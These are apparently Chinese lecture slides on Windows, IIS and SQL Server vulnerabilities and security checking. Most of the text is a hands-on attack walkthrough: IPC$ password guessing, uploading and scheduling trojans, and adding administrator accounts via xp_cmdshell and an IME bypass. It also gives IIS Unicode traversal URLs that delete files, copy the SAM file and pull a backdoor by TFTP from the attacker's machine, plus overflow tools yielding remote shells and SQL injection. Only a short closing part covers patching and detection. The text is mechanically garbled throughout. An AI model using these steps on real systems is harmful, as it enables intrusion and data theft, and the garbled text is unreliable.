系统安全漏洞与安全检测

蓝盾网络平安讲座-----张贺勋蓝盾平安小组系统平安漏洞与平安检测目录漏洞的形成漏洞的分类漏洞的检测工具漏洞的防范方法平安检测的目的常见平安检测的内容专业平安检测的内容一、漏洞形成后门：大型软件、系统的编写，是许多程序员共同完成。他们是将一个软件或系统分成假设干板块，分工编写，然后再汇总，测试。最后，修补,发布。在软件汇总时，为了测试方便，程序员总会留有后门；在测试以后再进行修补……这些后门，如果一旦疏忽〔或是为某种目的成心留下〕，或是没有发现，软件发布后自然而然就成了漏洞。程序假设干板块之间的空隙：这里很容易出现连程序员的都没想到的漏洞！蓝盾平安小组网络协议：网络协议有TCP、UDP、ICMP、IGMP等。其实，他们本来的用途是好的，但却被别人用于不乏的活动：例如，ICMP本来是用于寻找网络相关信息，后来却被用于网络嗅探和攻击；TCP本来是用于网络传输，后来却被用于泄漏用户信息。程序员自身的素质：程序员的自身对网络平安认识的不够，写出的程序自身就有漏洞。二、系统漏洞的分类

操作系统漏洞应用平台的漏洞应用系统的漏洞网络系统漏洞操作系统的漏洞弱口令弱口令就是用户的操作密码过于简单〔如‘123’〕。描述：本漏洞的危害性极强，它可以对系统效劳器作任何的操作。主要是因为管理员的平安意识缺乏。测试目的：用本漏洞控制效劳器系统。〔1〕我们可以用爆力破解工具或扫描器〔XSCAN等〕对机器进行扫描，可得到管理员密码。只要拥有管理员级权限，就能完全共享应用对方的机器，如下面的命令会将对方的C盘映射为自己的X盘：

c:\>netusex:\\[目标主机的IP地址]\c$"[密码]"/user:"[用户名]"

其中"c$"为系统默认共享，依此类推，同样可以共享对方的"d$","e$〔2〕运行AT命令。C:\>netstartschedule

Schedule正在启动效劳.....

Schedulw效劳启动成功。

AT的语法：

AT[\\computername][time]"command"

比方：

AT[\\computername][time]runnc.bat〔3〕用远程控制终端输入法漏洞描述：输入法漏洞可以说是中文Windows2000推出后的第一个致命漏洞,通过它我们可以做许多的事情,包括建立用户.测试1：使用文件类型编辑创立管理员用户

：

1.开机到登陆界面调出输入法,如全拼->帮助->操作指南,跳出输入法指南帮助文件

2.右击"选项"按钮,选择"跳至url"

3.在跳至URL上添上"c:\",其它的也可.

4.帮助的右边会进入c:5.按帮助上的"选项"按钮.

6.选"internet"选项.会启动文件类型编辑框.

7.新建一个文件类型,如一个you文件类型,在跳出的文件后缀中添上"you".确定.

8.选中文件类型框中的"you"文件类型,点击下面的"高级按钮",会出现文件操作对话框.

9.新建一种文件操作,操作名任意写,如"ppp"

10.该操作执行的命令如下:

C:\WINNT\system32\cmd.exe

/c

net

user

mayi

123456

/add

&

C:\WINNT\system32\cmd.exe

/c

net

localgroup

administrators

aboutnt

/add

完成后退出

11.将c:\的某个文件如"pipi.txt"改为"pipi.txt.mayi",然后双击翻开这个文件.

12.通常这个文件是打不开的,系统运行一会便没有了提示,但这时我们已经将用户mayi加上了,权限是管理员.

13.返回,重新以aboutnt用户登录即可。IPC$共享漏洞描述：危害性大，主要是和其它漏洞一块使用IPC$(Inter-ProcessCommunication)共享是NT计算机上的一个标准的隐含共享，它是用于效劳器之间的通信的。NT计算机通过使用这个共享来和其他的计算机连接得到不同类型的信息的。常常可利用这一点来，通过使用空的IPC会话进行攻击。测试1：通过本漏洞猜测用户密码c:\>netuse\\[目标机器的IP地址]\ipc$/user:<name><passwd>当这个连接建立后，要将username和password送去加以确认。如果你以"Administrator"登录，那么需要进行口令猜测。可以重复使用'net'命令，进行username和password猜测：c:\>netuse\\xxx.xxx.xxx.xxx\ipc$/user:<name><passwd>也可以使用脚本语句：open(IPC,"netuse\\xxx.xxx.xxx.xxx\ipc$/user:<name><passwd>");看看目标计算机上有那些共享的资源可以用下面命令：c:\>netview\\[目标计算机的IP地址]一旦IPC$共享顺利完成，下一个命令是：c:\>netuseg:\\xxx.xxx.xxx.xxx\c$得到了C$共享，并将该目录映射到g:，键入：c:\>dirg:/p就能显示这个目录的所有内容。测试2：通过测试1来上传木马控制效劳器c:\>netuse\\\ipc$〞〞/user:〞admin〞此时，cmd会提示命令成功完成。这样你就和建立了IPC连接。c:\>copyserver.exe\\\admin$上传server.exe到的winnt目录，因为winnt目录里的东西比较多，管理员不容易发现，所以我们把server.exe上传到里面。Server.exe是janker写的winshell生成的程序，WinShell是一个运行在Windows平台上的Telnet效劳器软件。c:\>nettime\\这个命令可以的到的系统时间，例如是00：00c:\>at\\00:01〞server.exe〞cmd会提示新加了一项任务，其作业ID为1，这样远程系统会在00:01时运行server.exe。c:\>at\\1这样可以查看ID为1的作业情况。c:\>netuse\\\ipc$/delete退出IPC连接。现在，server.exe已经在远程主机上运行了。输入：c:\>telnet21〔端口可以自己在winshell中设定〕这样就成功的telnet到上了。应用平台的漏洞SQLSERVER存在的一些平安漏洞：“SA〞帐号弱口令描述：危害性极强，它可以完作控制系统效劳器。存在“sa〞帐户，密码就为空，或密码过于简单，我们就可以通过扫描工具〔如X-SCAN等〕得到密码，用测试：通过XP-CMDSHEll来增加一个帐号如：Xp_cmdshell"netusertestuser/ADD"然后在：Xp_cmdshell"netlocalgroupAdministratorstestuser/ADD"这样攻击者就成功的在SQLSERVER上增加了一个用户。当然远程的话，一般需要有1433口开着，通过MSSQL客户端进行连接。最后你可以用添加的用户名通过远程控制终端来控制你效劳器系统。扩展存储过程参数解析漏洞：描述：危害性极强，它可以完作控制系统效劳器。起主要问题是在MSD中提供一个API函数srv_paraminfo(),它是用来扩展存储过程调用时解释深入参数的，如:exec<存储过程名><参数1>,<参数2>,...如要查询“c:\winnt〞的目录树，可以如下表达：execxp_dirtree'c:\winnt'但没有检查各个参数的长度，传递相当长的字符串，就存在了覆盖其他堆栈参数的可能导致缓冲溢出。目前受影响的扩展存储过程如下：xp_printstatements(xprepl.dll)xp_proxiedmetadata(xprepl.dll)xp_SetSQLSecurity(xpstar.dll)…关于openrowset和opendatasource

描述：危害性极强，它可以完作控制系统效劳器。利用openrowset发送本地命令

,通常我们的用法是〔包括MSDN的列子〕如下

select

*

from

openrowset(''sqloledb'',''myserver'';''sa'';'''',''select

*

from

table'')

可见〔即使从字面意义上看)openrowset只是作为一个快捷的远程数据库访问，它必须跟在select后面，也就是说需要返回一个recordset

那么我们能不能利用它调用xp_cmdshell呢？答案是肯定的！

select

*

from

openrowset(''sqloledb'',''server'';''sa'';'''',''set

fmtonly

off

exec

master.dbo.xp_cmdshell

''''dir

c:\'''''')

必须加上set

fmtonly

off用来屏蔽默认的只返回列信息的设置，这样xp_cmdshell返回的output集合就会提交给前面的select显示，如果采用

默认设置，会返回空集合导致select出错，命令也就无法执行了。

那么如果我们要调用sp_addlogin呢，他不会像xp_cmdshell返回任何集合的，我们就不能再依靠fmtonly设置了，可以如下操作

select

*

from

openrowset(''sqloledb'',''server'';''sa'';'''',''select

''''OK!''''

exec

master.dbo.sp_addlogin

Hectic'')

这样，命令至少会返回select

''OK!''的集合，你的机器商会显示OK!，同时对方的数据库内也会增加一个Hectic的账号，也就是说，我们利用

select

''OK!''的返回集合欺骗了本地的select请求，是命令能够正常执行，通理sp_addsrvrolemember和opendatasource也可以如此操作！

IIS漏洞IISunicode漏洞描述:危害性极强，可以完全的控制效劳器。对于IIS5.0/4.0中文版，当IIS收到的URL请求的文件名中包含一个特殊的编码例如“%c1%hh〞或者“%c0%hh〞,它会首先将其解码变成:0xc10xhh，然后尝试翻开这个文件，Windows系统认为0xc10xhh可能是unicode编码，因此它会首先将其解码，如果0x00<=%hh<0x40的话，采用的解码的格式与下面的格式类似：%c1%hh->(0xc1-0xc0)*0x40+0xhh%c0%hh->(0xc0-0xc0)*0x40+0xhh例如，在Windows2000简体中文版+IIS5.0+SP1系统下测试：://target/A.ida/%c1%00.idaIIS会报告说"@.ida"文件找不到这里:〔0xc1-0xc0)*0x40+0x00=0x40='@'://target/A.ida/%c1%01.idaIIS会报告说"A.ida"文件找不到这里:〔0xc1-0xc0)*0x40+0x01=0x41='A'攻击者可以利用这个漏洞来绕过IIS的路径检查，去执行或者翻开任意的文件。测试1：下面的URL可能列出当前目录的内容：://victim/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir测试2：利用这个漏洞查看系统文件内容也是可能的：://victim/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini测试3：删除空的文件夹命令：

://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+rd+c:\snowspider

测试4：删除文件的命令:

://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del+c:\autoexec.bak

测试5：Copy文件

://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy%20c:\winnt\repair\sam._%20c:\inetpub\wwwroot\

测试5：用木马〔用TFTP、NCX99〕在地址栏里填入：:///scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp-i???.???.???.???GETncx99.exec:\\inetpub\\scripts\\sr.exe???.???.???.???为你自己的IP，

注意：c:\\inetpub\\scripts\\sr.exe其中c:\\inetpub\\scripts\\为主机效劳器目录，要看主机的具体情况而定，sr.exe为被改名的ncx99.exe〔自己选名字吧〕。然后等待...大概3分钟...IE浏览器左下角显示完成，红色漏斗消失，这时ncx99.exe已经上传到主机c:\inetpub\scripts\目录了，您可以自己检查一下。再使用如下调用来执行ncx99.exe(sr.exe):///scripts/..%c1%1c../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\sr.exe然后您就可以telnet99printer远程缓存溢出漏洞缓存溢出:缓存溢出又称为缓冲溢出，缓冲区指一个程序的记忆范围(领域)，该领域是用来储存一些数据，如电脑程序信息，中间计算结果，或者输入参数。把数据调入缓冲区之前，程序应该验证缓冲区有足够的长度以容纳所有这些调入的数据。否那么，数据将溢出缓冲区并覆写在邻近的数据上，当它运行时，就如同改写了程序。假设溢出的数据是随意的，那它就不是有效的程序代码，当它试图执行这些随意数据时，程序就会失败。另一方面，假设数据是有效的程序代码，程序将会按照数据提供者所设定的要求执行代码和新的功能。描述：漏洞的活动范围是：这是一个缓存溢出漏洞，这漏洞比以往的普通溢出存在更大的危害，主要有两方面的原因：*在缺省平安的情况下，该漏洞可以被来自网络的利用。*可以完全获得和控制存在该漏洞的网站效劳器。一旦溢出成功，他可以做他想做的一些事情，包括：安装和运行程序，重新配置效劳，增加、改变或者删除文件和网页的内容等等。漏洞的起因是：WIN2K在网络打印ISAPI扩展上缺少足够的缓冲区检查，当一个发出特殊的请求效劳时产生缓存溢出，可以让在本地系统执行任意代码。测试：通过IIS5HACK工具来检用信息iis5hacksomeip803iis5remote.printeroverflow.writenbysunx://fortestonly,dontusedtohack,:pconnecting...sending...Nowyoucantelnetto99portgoodluck:)c:\telnet699MicrosoftWindows2000[Version5.00.2195](C)Copyright1985-2000MicrosoftCorp.C:\WINNT\system32>已经进入目标主机，你想干什么就是你的事啦。IISIndexServer(.ida/idq)ISAPI扩展远程溢出漏洞描述：危害性极强，它可以完作控制系统效劳器。微软IIS缺省安装情况下带了一个索引效劳器(IndexServer,在Windows2000下名为"IndexService").缺省安装时，IIS支持两种脚本映射：管理脚本(.ida文件)、Inernet数据查询脚本(.idq文件)。这两种脚本都由一个ISAPI扩展-idq.dll来处理和解释。由于idq.dll在处理某些URL请求时存在一个未经检查的缓冲区，如果攻击者提供一个特殊格式的URL,就可能引发一个缓冲区溢出。通过精心构造发送数据，攻击者可以改变程序执行流程，执行任意代码。成功地利用这个漏洞,攻击者可以远程获取"LocalSystem"权限。测试:来控制效劳器。运行IDQGUI程序，出现一个窗口，填好要入侵的主机IP，选取所对应的系统SP补丁栏，其他设置不改，取默认。然后按右下角的IDQ益出键。

如果成功如图如果不成功会提示连接错误。连接成功后，我们翻开WIN下的DOS状态，输入：NC-VVX.X.X.X813

如果成功如图不成功的话可以在IDQGUI程序里换另一个SP补丁栏试试，如果都不行，就放弃。换其他漏洞机器。4、应用系统漏洞编程语言漏洞MDB数据库可下载漏洞描述：危害性强，可以得到网站的所有内容。数据库中一般存放的是客户的帐号、密码以及网站的中所有内容，如果得到了数据库，也就可以说得到了网站的一功，原理，WEB效劳器遇到不能解释的文件是就给下载，测试：在地址栏输入://someurl/path/name.mdb，你会发现name.mdb的数据库给下载下来。SQL语句漏洞描述：危害性强，可以进入网站的后台应用程序。假设没有过滤必要的字符：

select

*

from

login

where

user='$HTTP_POST_VARS[user]'

and

pass='$HTTP_POST_VARS[pass]'

我们就可以在用户框和密码框输入1'

or

1='1通过验证了。这是非常古董的方法了，这个语句会替换成这样：

select

*

from

login

where

user='1'

or

1='1'

and

pass='1'

or

1='1'

因为or

1='1'成立，所以通过了。解决的方法最好就是过滤所有不必要的字符，Jsp代码泄漏漏洞描述：危害性强，有可能可以查看到数据库帐号密码。

在访问JSP页面时，如果在请求URL的.jsp后缀后面加上一或多个‘.‘、‘%2E’、‘+’、‘%2B’、‘\’、‘%5C’、‘%20’、‘%00’，会泄露JSP源代码。测试:查看网页源代码://localhost:8080/index.jsp效劳器会正常解释。

://localhost:8080/index.jsp.只要在后面加上一个.就会导致源代码泄漏(可以通过浏览器的查看源代码看到)。

原因：

由于Windows在处理文件名时，将"index.jsp"和"index.jsp."认为是同一个文件。

CGI漏洞x.htworqfullhit.htworiirturnh.htw

描述：危害性强，IIS4.0上有一个应用程序映射htw--->webhits.dll，这是用于IndexServer的点击功能的。尽管你不运行IndexServer，该映射仍然有效。这个应用程序映射存在漏洞，允许入侵者读取本地硬盘上的文件，数据库文件，和ASP源代码。一个攻击者可以使用如下的方法来访问系统中文件的内容：

://victim/iissamples/issamples/oop/qfullhit.htw?

ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full就会在有此漏洞系统中win.ini文件的内容。webhits.dll后接上"../"便可以访问到Web虚拟目录外的文件,下面我们来看个例子:

://somerul/iissamples/issamples/oop/qfullhit.dll?CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full

在浏览器中输入该地址,便可以获得该效劳器上给定日期的Web日志文件.在系统常见的.htw样本文件有:/iissamples/issamples/oop/qfullhit.htw

/iissamples/issamples/oop/qsumrhit.htw

/iissamples/exair/search/qfullhit.htw

/iissamples/exair/search/qsumrhit.hw

/iishelp/iis/misc/iirturnh.htw[这个文件通常受loopback限制]

利用inetinfo.exe来调用webhits.dll,这样同样能访问到Web虚拟目录外的文件,这样请求一个.htw文件:

://url/default.htm.htw?CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1

/ex000121.log&CiRestriction=none&CiHiliteType=Full

这个请求肯定会失败，但请注意,我们现在已经调用到了webhits.dll,我们只要在一个存在的文件资源后面[也就是在.htw前面]加上一串特殊的数字(%20s),[就是在例子中default.htm后面加上这个代表空格的特殊数字],这样我们便可以欺骗过web效劳器从而到达我们的目的.由于在缓冲局部中.htw文件名字局部被删除掉[由于%20s这个符号],所以,当请求传送到webhits.dll的时候,便可以成功的翻开该文件,并返回给客户端,而且过程中并不要求系统中真的存在.htw文件。比方：

://url/default.htm%20s.htw?CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1

/ex000121.log&CiRestriction=none&CiHiliteType=Full解决方法：hit-highligting功能是由IndexServer提供的允许一个WEB用户在文档上highlighted〔突出〕他们原始搜索的条目，这个文档的名字通过变量CiWebhitsfile传递给.htw文件，Webhits.dll是一个ISAPI应用程序来处理请求，翻开文件并返回结果，当用户控制了CiWebhitsfile参数传递给.htw时，他们就可以请求任意文件，结果就是导致查看ASP源码和其他脚本文件内容。要了解你是否存在这个漏洞，你可以请求如下条目：://victim/nosuchfile.htw

如果你从效劳器端获得如下信息：

formatoftheQUERY_STRINGisinvalid

这就表示你存在这个漏洞。

这个问题主要就是webhits.dll关联了.htw文件的映射，所以你只要取消这个映射就能防止这个漏洞，你可以在你认为有漏洞的系统中搜索.htw文件，一般会发现如下的程序：

/iissamples/issamples/oop/qfullhit.htw

/iissamples/issamples/oop/qsumrhit.htw

/isssamples/exair/search/qfullhit.htw

/isssamples/exair/search/qsumrhit.htw

/isshelp/iss/misc/iirturnh.htw(这个一般为loopback使用)msadc描述：IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDSDatafactory，默认情况下，它允许远程命令发送到IIS效劳器中，这命令会以设备用户的身份运行，其一般默认情况下是SYSTEM用户。测试：结合木马来控制效劳器C:\Perl\BIN>perl-xmsadc2.pl-h目标机xxx.xxx.xxx.xxxPleasetypetheNTcommandlineyouwanttorun(cmd/cassumed):\ncmd/c一般这里我用TFTP上传我的木马文件，但首先你得先设置好你的TFTP主机tftp-igetntsrv.exec:\winnt\system32\ntsrv.exe这里

是我的TFTP主机，TFTP目录下有NTSRV。EXE木马如果程序执行成功，TFTP会显示文件传输的进度，然后再执行PERL，将木马激活，你再用木马连上对方的机器，搞定2、C:\Perl\BIN>perl-xmsadc2.pl-h目标机cmd/cnetuserpt007/add3、C:\Perl\BIN>perl-xmsadc2.pl-h目标机cmd/cnetuserpt007ptlove4、C:\Perl\BIN>perl-xmsadc2.pl-h目标机cmd/cnetlocalgroupadministratorspt007/add5、C:\Perl\BIN>perl-xmsadc2.pl-h目标机cmd/cc:\winnt\system32>ncx99.exeuploader.exe

描述：本漏洞的危害性强，如果您使用NT作为您的WebServer的操作系统,入侵者能够利用uploader.exe上传任何文件。

测试：上传一个木马在地址栏输入：://host/cgi-win/uploader.exe

会带你到上传页面三、漏洞检测工具商业ISSBD-SCANNERN-STEALTHPROMISCAN自由HFNETCHKX-SCAN流光四、漏洞的解决方法打补丁打对应的补丁是最好的解决方法，可以到微软下载中心://microsoft/downloads/search.asp下载所需的补丁。另注意以后要不断下载升级补丁。用IISLOCKTOOLS

防火墙五、平安检测目地对系统漏洞的发现确定是否被入侵过1、日志的检测〔1〕日志的分类操作系统平安日志应用程序日志系统日志应用系统其它HTTP状态代码说明200代码说明了所有的工作一切正常，传输过程很成功201代码说明成功发出并执行了一POST命令202代码说明客户的命令由效劳器接受以进行处理204代码说明客户的请求得到处理，效劳器不能返回数据300代码说明客户请求的数据最近被移走301代码说明效劳器发现客户所请求的数据位于一个替代的临时重定向的URL302代码说明效劳器建议客户到一个替代的位置去请求数据303代码说明出现了一个问题，效劳器不能修改请求数据400代码说明客户发出了一个异常的请求，因此不能被处理401代码说明客户试图访问一个未被授权的访问的数理403代码说明访问被禁止404代码说明文档未找到500说明一个效劳器不能恢复的内部效劳器错误502代码说明效劳器过载目地：发现CGI漏洞入侵者，以及WEB效劳的情况平安性日志平安性根本上捕获那些成功和失败审核事件，同时对这种事性的概述很简单。如以下图WIN2000系统日志IIS日志路径：c:\winnt\system32\logfile\w3svc1FTP日志路径：c:\winnt\system32\logfile\MSFTPSVC12、端口扫描作用：发现木马和确定开通的效劳。工具：SUPERSCAN、PORTSCAN、3、网络的监视作用：发现网络攻击工具：TCPDUMP〔LINUX〕、WINDUMP〔WINDOWS〕、命今NETSTAT4、检查用户帐号和组信息启动"用户管理器"程序，或者在命令行状态下执行"netuser"、"netgroup"和"netlocalgroup"命令，查看当前用户和组清单，确保内置GUEST帐号被禁止使用：看看是否有非法组成员存在。默认安装后的组都具有特殊权限，例如，Administrators组成员有权对本地系统做任何事情，Backupoperators组成员有权读取系统中的所有文件，PowerUsers组成员有权创立共享。不要让一些不适宜的用户隐藏在这些组中。5、定时任务中是否存在可疑程序检查定时任务中是否存在可疑程序。攻击者可以让后门程序定时运行，以便将来重新入侵。更进一步地，要准确核对定时任务所对应的实际程序名是否合法。在命令行状态下执行“at〞命令可以很方便地看到这些信息。6、临时进程检查是否存在临时进程。要获取这些信息，可以借助任务管理器、也可以在命令行执行pulist.exe和tlist.exe。pulist可以查看每个进程由谁启动，tlist-f可以查看哪个进程又启动了子进程。7、检测混杂模式的网卡作用：确认是否被监听。软件：PROMISCAN嗅探行为已经成为网络平安的一个巨大威胁。通过网络嗅探，一些恶意用户能够很容易地窃取到绝密的文档和任何人的隐私。要实现上述目的非常容易，恶意用户只要从网络上下载嗅探器并平安到自己的计算机就可以了。然而，却没有一个很好的方法来检测网络上的嗅探器程序,以下将讨论使用地址解析协议(AddressResolutionProtocol)报文来有效地检测网络上的嗅探器程序。原理和检测方法:例如：网络上一台IP地址为的PC(X)以太网地址是00-00-00-00-00-01，这台PC(X)需要向网络上另外一台IP地址为0的PC(Y)发送消息。在发送之前，X首先发出一个ARP请求包查询0对应的以太网地址。查询包的目的地址被设置为FF-FF-FF-FF-FF-FF(播送)，从而本地网络上的所有节点都可以收到这个包。收到之后，每个节点会检查这个ARP包查询的IP地址和本机的IP地址是否匹配。如果不同，就忽略这个ARP包；如果匹配(Y)就向X发出应答。X收到应答之后就缓存Y的IP/硬件地址。然后